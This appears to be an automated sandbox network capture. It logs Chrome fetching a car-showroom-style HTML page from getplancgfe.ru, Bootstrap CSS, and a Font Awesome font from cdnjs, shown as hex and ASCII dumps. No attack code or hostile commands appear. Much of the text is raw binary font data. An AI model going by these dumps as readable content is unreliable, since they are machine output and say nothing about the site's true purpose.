                                                                                        2024-11-01 12:46:35 UTC1378INData Raw: 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 74 65 78 74 66 69 65 6c 64 7d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 63 6f 6c 6f 72 2d 73 77 61 74 63 68 2d 77 72 61 70 70 65 72 7b 70 61 64 64 69 6e 67 3a 30 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 3a 3a 66 69 6c 65 2d 73 65 6c 65 63 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 6f 75 74 70 75 74
                                                                                        Data Ascii: bkit-appearance:textfield}::-webkit-search-decoration{-webkit-appearance:none}::-webkit-color-swatch-wrapper{padding:0}::-webkit-file-upload-button{font:inherit;-webkit-appearance:button}::file-selector-button{font:inherit;-webkit-appearance:button}output
                                                                                        2024-11-01 12:46:35 UTC1378INData Raw: 69 6c 64 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 72 65 6d 7d 2e 69 6e 69 74 69 61 6c 69 73 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 3e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 62 6c 6f 63 6b 71 75 6f 74 65 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 65 6d 3b 63 6f 6c 6f 72 3a 23 36 63 37 35 37 64 7d 2e 62
                                                                                        Data Ascii: ild){margin-right:.5rem}.initialism{font-size:.875em;text-transform:uppercase}.blockquote{margin-bottom:1rem;font-size:1.25rem}.blockquote>:last-child{margin-bottom:0}.blockquote-footer{margin-top:-1rem;margin-bottom:1rem;font-size:.875em;color:#6c757d}.b
                                                                                        2024-11-01 12:46:35 UTC1378INData Raw: 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 7b 6d 61 78 2d 77 69 64 74 68 3a 31 33 32 30 70 78 7d 7d 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 73 6d 3a 35 37 36 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6d 64 3a 37 36 38 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 6c 67 3a 39 39 32 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 6c 3a 31 32 30 30 70 78 3b 2d 2d 62 73 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 78 6c 3a 31 34 30 30 70 78 7d 2e 72 6f 77 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 3b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77
                                                                                        Data Ascii: ,.container-xxl{max-width:1320px}}:root{--bs-breakpoint-xs:0;--bs-breakpoint-sm:576px;--bs-breakpoint-md:768px;--bs-breakpoint-lg:992px;--bs-breakpoint-xl:1200px;--bs-breakpoint-xxl:1400px}.row{--bs-gutter-x:1.5rem;--bs-gutter-y:0;display:flex;flex-wrap:w


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.2.449786104.21.8.814435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:35 UTC339OUTGET // HTTP/1.1
                                                                                        Host: getplancgfe.ru
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:36 UTC847INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:36 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        vary: Accept-Encoding
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ssdGAEW6YzQW3%2FUUTakYvKr09NtfQY%2BxTavFtmJsfBfoWAxZyApkVgudE7D3f9f7R7%2FQDLjfo5dLTLA45aoZnev5N4CkEMw7amBEHD%2FmWdsM1zkBzbmnS8VhyHGI7gHlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd12fa444779-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=917&delivery_rate=1811131&cwnd=251&unsent_bytes=0&cid=52a20b0d5a63498b&ts=799&x=0"
                                                                                        2024-11-01 12:46:36 UTC522INData Raw: 31 64 34 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 55 6c 74 69 6d 61 74 65 20 53 75 70 65 72 63
                                                                                        Data Ascii: 1d4b<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noarchive, nosnippet, noindex, nofollow"> <title>Ultimate Superc
                                                                                        2024-11-01 12:46:36 UTC1369INData Raw: 79 3e 0d 0a 0d 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 20 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 6e 61 76 62 61 72 2d 64 61 72 6b 20 62 67 2d 64 61 72 6b 20 73 74 69 63 6b 79 2d 74 6f 70 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 66 77 2d 62 6f 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 65 74 70 6c 61 6e 63 67 66 65 2e 72 75 2f 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 61 72 22 3e 3c 2f 69 3e 20 55 6c 74 69 6d 61 74 65 20 53 75 70 65 72 63 61 72 20 4c 65 61 67 75 65 20 2d 20 41 75 74 6f 53 68 6f 77 72 6f
                                                                                        Data Ascii: y><nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top"> <div class="container"> <a class="navbar-brand fw-bold" href="https://getplancgfe.ru//"> <i class="fas fa-car"></i> Ultimate Supercar League - AutoShowro
                                                                                        2024-11-01 12:46:36 UTC1369INData Raw: 63 65 49 61 42 4c 2d 42 42 6a 43 4a 56 65 58 72 33 52 77 48 61 45 38 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 70 79 2d 35 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 34 20 66 77 2d 62 6f 6c 64 22 3e 44 69 73 63 6f 76 65 72 20 59 6f 75 72 20 4e 65 78 74 20 43 61 72 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 43 61 72 73 20 61 72 65 20 74 68 65 20 62 65 73 74 20 6b 69 6e 64 20 6f 66 20 74 68 65 72 61 70 79 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74
                                                                                        Data Ascii: ceIaBL-BBjCJVeXr3RwHaE8') no-repeat center; background-size: cover;"> <div class="container py-5"> <h1 class="display-4 fw-bold">Discover Your Next Car</h1> <p class="lead">Cars are the best kind of therapy.</p> <a href="ht
                                                                                        2024-11-01 12:46:36 UTC1369INData Raw: 79 20 74 65 78 74 2d 63 65 6e 74 65 72 27 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 65 74 70 6c 61 6e 63 67 66 65 2e 72 75 2f 2f 23 69 6e 76 65 6e 74 6f 72 79 27 20 63 6c 61 73 73 3d 27 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 73 6d 27 3e 3c 69 20 63 6c 61 73 73 3d 27 66 61 73 20 66 61 2d 69 6e 66 6f 2d 63 69 72 63 6c 65 27 3e 3c 2f 69 3e 20 56 69 65 77 20 44 65 74 61 69 6c 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                                                        Data Ascii: y text-center'> <a href='https://getplancgfe.ru//#inventory' class='btn btn-primary btn-sm'><i class='fas fa-info-circle'></i> View Details</a> </div> </div> </div
                                                                                        2024-11-01 12:46:36 UTC1369INData Raw: 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 20 64 69 73 70 6c 61 79 2d 36 20 66 77 2d 62 6f 6c 64 20 6d 62 2d 34 22 3e 4f 75 72 20 53 65 72 76 69 63 65 73 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 74 6f 6f 6c 73 20 64
                                                                                        Data Ascii: yle="background-color: #333;"> <div class="container"> <h2 class="text-center display-6 fw-bold mb-4">Our Services</h2> <div class="row text-center"> <div class="col-md-4 mb-4"> <i class="fas fa-tools d
                                                                                        2024-11-01 12:46:36 UTC1369INData Raw: 2d 36 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6d 61 69 6c 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 72 6f 77 73 3d 22 34 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4d 65 73 73 61 67 65 22 20 72 65 71 75 69 72 65 64 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 20 20 20 20 20 20 20
                                                                                        Data Ascii: -6"> <input type="email" class="form-control" placeholder="Email" required> </div> <div class="col-12"> <textarea class="form-control" rows="4" placeholder="Message" required></textarea>
                                                                                        2024-11-01 12:46:36 UTC140INData Raw: 0a 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                        Data Ascii: </footer><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script></body></html>
                                                                                        2024-11-01 12:46:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.2.449789104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:36 UTC652OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://ecoutura.sa.com
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: font
                                                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:37 UTC983INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:37 GMT
                                                                                        Content-Type: application/octet-stream; charset=utf-8
                                                                                        Content-Length: 156532
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: "656632a7-26374"
                                                                                        Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 675514
                                                                                        Expires: Wed, 22 Oct 2025 12:46:37 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZmoglDQ4EQWoH0EtQo1pB1NSKFpMgIS1Yon%2BbPOLSpkY3ZlqkaFbwpevG%2F0nniripYY%2F6%2FACNZss3SzecvpzFO8hZyMmulPzwbFb0XpuESuY5Idyq1a9lVIobusZ6g9z%2BdHk%2FAWc"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd19481e6c14-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:37 UTC386INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 74 00 0a 00 00 00 06 1a 41 00 02 63 28 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 5c cb ab 40 05 87 6d 07 20 25 20 0d 93 95 01 50 58 9d 00 00 e8 fa 36 1e 46 a4 68 f6 f0 14 91 b3 5e 0f 80 aa aa aa aa aa 66 25 04 1c d7 b6 bd aa 2a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe f4 17 7f f5 37 7f f7 0f ff f4 2f ff f6 1f ff f5 3f ff f7 9f 02 83 71 f7 0f 84 69 d9 8e cb ed f1 fa fc 86 ff 68 bf d7 73 27 40 b4 49 0a c2 f3 44 95 15 ca 56 d5 46 d8 29 28 56 b2 8a 60 fd 37 aa 42 07 df a7 f1 1f 75 e9 b3 ec 0b 00 4a a7 f3 fb 49 19 55 9c 80 39 45 de 11 60 4d b7 8e cd 5a 66 95 d1 c8 ff a9 98 52 0e 26 9a 74 26 26 d2 6a 8b 8a f9 cb 2d a2 95 24 d3 17 c0 22 3b a8 3a
                                                                                        Data Ascii: wOF2ctAc(6$ `<\@m % PX6Fh^f%*~W7/?qihs'@IDVF)(V`7BuJIU9E`MZfR&t&&j-$";:
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: a4 40 65 6b 81 03 5e 20 c5 8d 55 c2 bf 25 8a 17 e1 93 b8 a8 45 20 f7 7f 09 70 7a 26 f8 13 4d ad be 5e 35 54 57 77 41 63 95 64 d9 96 ac b6 ba 1d 43 ac b2 a4 ee 84 95 8c e7 36 59 cc cd 12 79 89 b3 9c 65 dd 0c 2f 66 8e 50 0b c4 3a e2 1c b1 76 f7 00 ff 5f 42 e9 88 b4 d4 ba 7a 42 4f 4f cf f4 84 84 b0 00 06 98 05 66 37 63 76 16 98 bd db 3b de 5c de cb 60 3a ee 31 88 20 8f 62 48 5a 89 e2 91 22 45 11 54 24 45 85 35 69 45 cb 14 14 79 14 65 f9 94 29 d1 22 a1 10 6d cb f7 a6 43 7a 7b 9d f2 59 72 90 1c b0 ff 3f 69 6a fd bb af c2 ab 57 e1 55 48 08 0d a0 80 02 50 40 77 a3 1b d5 68 a0 3a b0 c9 22 d9 14 49 2b b0 ad 44 52 92 2d 28 51 94 e5 00 af 34 72 a0 03 e4 28 c9 bb 52 3b 48 43 67 38 d3 61 77 7b c6 49 b6 bc 63 38 c5 c3 99 2c 7b f7 7f 4c 96 35 89 93 82 aa 8f c8 52 ad ab
                                                                                        Data Ascii: @ek^ U%E pz&M^5TWwAcdC6Yye/fP:v_BzBOOf7cv;\`:1 bHZ"ET$E5iEye)"mCz{Yr?ijWUHP@wh:"I+DR-(Q4r(R;HCg8aw{Ic8,{L5R
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: c7 ec 30 a8 f8 bd b6 e6 f6 fb a4 c1 88 e9 33 59 ee 8b 7f cf 02 d3 43 9f b9 c6 d3 ca 8e d9 e7 d7 2d 3f 23 1b 04 ff aa 75 23 bb fa 69 5c 0b cf 77 f5 69 69 7c 4b c9 8e d6 75 ee 1c 67 63 5f 25 fa a9 be d9 e8 3e 35 3e cb ac d9 b3 c0 54 d9 b6 1c b3 d8 37 c1 33 02 7b 3f 13 ae c8 b7 75 89 75 b6 a5 ab ee 87 19 53 a6 8f ea d1 dd 9b 33 bd ef 8b c3 06 fc 41 e5 d1 b5 05 c8 91 77 bf b7 ca 19 18 6a 41 bc 07 23 b9 b3 64 ce 9d 85 ac 8e 06 dd 2c 8f 9f 9c ec ca 6d 7e b7 1a e7 69 03 bd d6 c0 0f 93 67 2a 98 36 5b 3d de 45 aa d9 e4 77 44 ff 52 ce a2 f6 b3 b7 a7 5d e6 eb 59 9b ab 26 f5 9e e1 d0 65 6b 78 71 6d 94 fa 52 f8 7b 3b e6 e3 71 52 a7 cc 87 96 ab a9 6f 23 be fd 59 d5 3c f6 fe 33 3e 49 cd 2b e5 5b 8f 13 6a 6a fc 5c a8 9a cd 79 34 03 b7 7f 81 e3 a0 47 2b 78 c5 ba 0d 9c c5
                                                                                        Data Ascii: 03YC-?#u#i\wii|Kugc_%>5>T73{?uuS3AwjA#d,m~ig*6[=EwDR]Y&ekxqmR{;qRo#Y<3>I+[jj\y4G+x
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: ce 7e b4 9f ed 0f fb d3 fe b6 ff 62 77 c2 fd e1 d5 b0 3a 7c 16 fe 0e ff 10 f4 e8 33 60 26 73 59 4a cd 28 2d 43 d6 62 1d d6 63 7d b6 60 4b b6 a7 63 47 0e e1 50 0e e3 70 8e e0 48 8e e7 04 56 71 31 97 70 39 57 72 15 57 73 0d d7 72 1d 37 71 2b 77 70 17 f7 f3 00 0f f2 10 0f f3 08 8f f2 18 8f f3 04 4f f2 14 2f f2 0e ef f2 31 9f f0 29 5f f0 25 5f f1 3b 7f f1 af 40 94 04 12 91 44 49 92 64 49 91 74 c9 94 2c c9 96 1c c9 95 3c 29 15 23 0d a5 b3 74 95 6e d2 43 fa 4a 3f e9 2f 03 65 9c 6c 91 ad b2 ad b2 49 65 d3 da a9 b5 8b 6b 97 d4 8e d5 ee 55 13 57 83 87 e8 26 8e 29 6d 06 98 09 66 91 59 62 36 9b 6d 66 9f 39 68 8e 9a 9b e6 91 79 69 9c e4 96 62 52 4a ea 48 5b e9 2c dd 65 a8 8c 97 99 b2 54 36 c9 2e 39 26 e7 e4 92 dc 95 fb f2 50 3e ca 17 f9 2e ff 6d 64 9b c6 66 b7 c5 ed
                                                                                        Data Ascii: ~bw:|3`&sYJ(-Cbc}`KcGPpHVq1p9WrWsr7q+wpO/1)_%_;@DIdIt,<)#tnCJ?/elIekUW&)mfYb6mf9hyibRJH[,eT6.9&P>.mdf
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: 21 f4 99 c2 39 05 e7 e7 02 5c 84 8b 72 49 2e c5 55 b8 2a 2f e3 4d bc 9d f7 f2 31 3e c9 67 f9 12 df e2 07 fc 98 a9 1f e7 16 79 ec d9 25 8f 14 94 52 52 6e 55 cd a4 b5 74 90 ae d2 5d fa b0 a1 d1 32 4e 26 c9 14 99 25 2b 65 b5 6c 66 fc e4 dc ae 6d f5 41 42 b6 fc 29 6a 6f f2 1f f1 90 10 c9 e7 cc 8d 7c 28 88 72 5f a6 09 5a a2 2d 3a a2 0f fa 61 10 86 62 3c 26 63 1a 66 62 3e 96 b1 f1 9b b0 15 db b1 07 07 70 02 67 70 01 97 70 15 d7 71 07 f7 d9 ea 15 02 3d b3 5b b8 8b ea 62 f4 13 b9 a4 2e c5 bc f1 50 bc 3f f5 e7 ec 9f f3 e6 72 fc ef 6a fe 7f f8 ff 83 ff ef fc 7f e3 ff 6b f8 63 13 a6 40 e9 02 45 0b 14 8c df e2 fd 78 31 1e 8f c7 e2 8e b8 2d 6e 8d 9b e3 06 20 2e 8c b3 e3 8c 58 29 96 8e 25 62 9e 98 2e a6 f4 ff fd b3 bf f6 47 7e c3 cf f8 69 3f e0 3b 7d 9b 6f f2 8d be c1
                                                                                        Data Ascii: !9\rI.U*/M1>gy%RRnUt]2N&%+elfmAB)jo|(r_Z-:ab<&cfb>pgppq=[b.P?rjkc@Ex1-n .X)%b.G~i?;}o
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: dc d5 6a 1b 73 8c cb b4 11 80 0d 0b b3 00 e3 43 7b f1 70 cf 22 0c 69 bf 79 6f 57 77 e9 2e 1c f2 43 a6 3f 5b 5a 83 b3 6a 52 78 3a 5a 87 7a 1c ff c4 b4 e3 c0 8e 01 3b 04 6c 2f 3c 4a df c3 15 dc 41 69 f5 e4 af 6b 43 38 89 8c 1a 34 a6 09 4d 69 46 73 5a d0 92 56 b4 a6 0d 6d 69 47 7b 3a d0 91 12 65 aa c8 a9 a6 42 50 d0 89 ce 74 a1 2b dd e8 4e 0f 7a 72 2d f7 d8 e5 76 85 5d 69 d7 d9 f5 76 93 dd 62 b7 da 5d 76 9f 3d 61 4f da 53 f6 96 bd 6f 1f d8 87 f6 91 7d 6c 9f d8 a7 f6 b9 7d 61 5f da 37 f6 ad 7d 67 3f d9 cf f6 8b fd 6a 7f da 0c 9b 63 8b 6c b1 ad b2 d5 42 35 d5 5c 2d d5 56 b9 ba ab 87 7a a9 bf 06 68 a0 86 6a b8 c6 6a 9c c6 6b 92 26 6b 8a a6 6a 5b 6d a7 1d b4 93 76 d5 b1 3a 59 a7 ea 0c 9d ad 0b 74 a1 2e d2 c5 ba 44 97 ea 32 5d ae eb 74 bd 6e d3 ed ba 57 8f e8 49
                                                                                        Data Ascii: jsC{p"iyoWw.C?[ZjRx:Zz;l/<JAikC84MiFsZVmiG{:eBPt+Nzr-v]ivb]v=aOSo}l}a_7}g?jclB5\-Vzhjjk&kj[mv:Yt.D2]tnWI
                                                                                        2024-11-01 12:46:37 UTC1369INData Raw: a4 9f 56 d7 4b 08 3b 50 af 05 3b 52 6f 0d 3b 51 ef 08 3b 53 ef 0a bb 50 1f bc 1c bb 52 1f 43 7d 6c ff ab ae 4f 77 39 f6 a0 be 88 fa e2 3e 57 5d df 20 ec 4d 7d 07 ec 43 fd 08 ec 4b fd 0c ec 47 fd 02 ec 4f fd 36 1c 40 fd 2e 1c 48 fd 3e 1c 44 fd 3d 1c 4c fd 33 1c 42 fd 1b 1c 4a fd 1f 1c 46 6f f0 08 0e a7 37 15 bd a9 71 04 bd 59 81 a3 e8 2d 0a 47 d3 3b 11 8e a1 77 09 1c 4b ef 7e 38 8e de c3 70 3c bd 67 e1 04 7a 2f 8d e0 44 7a af d2 7b 0d 27 d1 fb 02 38 85 de b7 70 2a 7d 93 c3 69 f4 dd 3e 82 d3 e9 bb 93 be bb 70 06 7d bf 02 67 d1 2c 02 67 d3 2c 3b 82 73 68 96 a7 59 01 e7 d2 ec 02 9c 4f b3 f7 57 74 01 cd 7e 34 fb e3 42 9a 83 68 0e c6 c5 34 67 00 97 d2 9c 03 97 d1 5c fb 15 5d 4e 73 03 cd ad b8 82 e6 76 9a 3b 70 1d cd dd 2c c7 0d 34 f7 d2 bc d2 cf fd 89 9a d7 68
                                                                                        Data Ascii: VK;P;Ro;Q;SPRC}lOw9>W] M}CKGO6@.H>D=L3BJFo7qY-G;wK~8p<gz/Dz{'8p*}i>p}g,g,;shYOWt~4Bh4g\]Nsv;p,4h
